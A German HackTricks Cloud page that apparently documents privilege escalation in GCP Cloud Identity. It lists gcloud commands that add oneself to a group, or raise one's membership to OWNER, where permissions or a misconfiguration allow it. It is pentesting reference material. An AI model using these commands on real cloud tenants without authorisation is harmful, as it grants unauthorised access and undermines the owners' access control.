German - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

GCP - Cloudidentity Privesc

Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Cloudidentity

Für weitere Informationen über den Cloudidentity-Dienst besuchen Sie diese Seite:

pageGCP - IAM, Principals & Org Policies Enum

Fügen Sie sich einer Gruppe hinzu

Wenn Ihr Benutzer über ausreichende Berechtigungen verfügt oder die Gruppe falsch konfiguriert ist, kann er sich möglicherweise selbst als Mitglied einer neuen Gruppe hinzufügen:

gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER

Gruppenmitgliedschaft ändern

Wenn Ihr Benutzer über ausreichende Berechtigungen verfügt oder die Gruppe falsch konfiguriert ist, kann er sich möglicherweise zum OWNER einer Gruppe machen, der er angehört:

# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>

# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER
Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

PreviousGCP - Cloudfunctions PrivescNextGCP - Cloudscheduler Privesc

Last updated